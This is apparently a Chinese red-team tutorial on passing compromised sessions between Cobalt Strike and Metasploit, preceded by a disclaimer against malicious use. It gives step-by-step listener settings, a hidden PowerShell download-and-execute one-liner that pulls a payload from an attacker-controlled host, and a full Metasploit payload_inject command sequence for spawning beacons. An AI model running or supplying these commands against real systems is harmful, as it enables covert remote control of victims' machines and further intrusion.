声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
CobalStrike更适合做个稳控平台,轻型的远控工具,内置Windows系统类模块较多,Metasploit更擅长各类内网搜集和漏洞利用,包含多类型操作系统模块,但是使用起来“比较笨重”。
01
CS反弹meterpreter到MSF
首先我们需要在msf中设置监听payload选择reverse_http,设置好本机的IP地址为192.168.80.129,端口为9998。
在CobaltStrike中点击Listener,设置名字可任意设置,Payload为Foreign HTTP,HTTP Host主机ip地址为192.168.80.129, HTTP Port端口为9998
在已生成的beacon shell中,右键选择Spawn;
然后选择刚刚设定的那个名字,payload为 windows/foreign/reverse_http,然后点击Choose;
可以看到成功的由CS反弹meterpreter到MSF
02
MSF反弹Beacon shell到CS
这里在CS中利用Attacks-> Web Drive-by -> Scripted Web Delivery 来部署一个Payload分发站点:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.80.129:80/a'))"
在meterpreter中执行上面的powershell语句,可以成功反弹到CS
也可以在获得meterpreter会话后,利用MSF注入功能,加载CS的payload
#进入payload_inject模块
msf>use exploit/windows/local/payload_inject
#根据CS监听器类型选择对应的payload(http或者https)
msf>set payload windows/meterpreter/reverse_http
#设置回连地址(CS监听器地址)
msf>set LHOST CS_IP
msf>set LPORT CS_PORT
#指定要执行的meterpreter会话
msf>set session meterpreter会话ID
#设置MSF不启动监听(不然的话msf会提示执行成功,但没有会话建立,同时CS也不会接收到会话)
msf>set disablepayloadhandler true
msf>run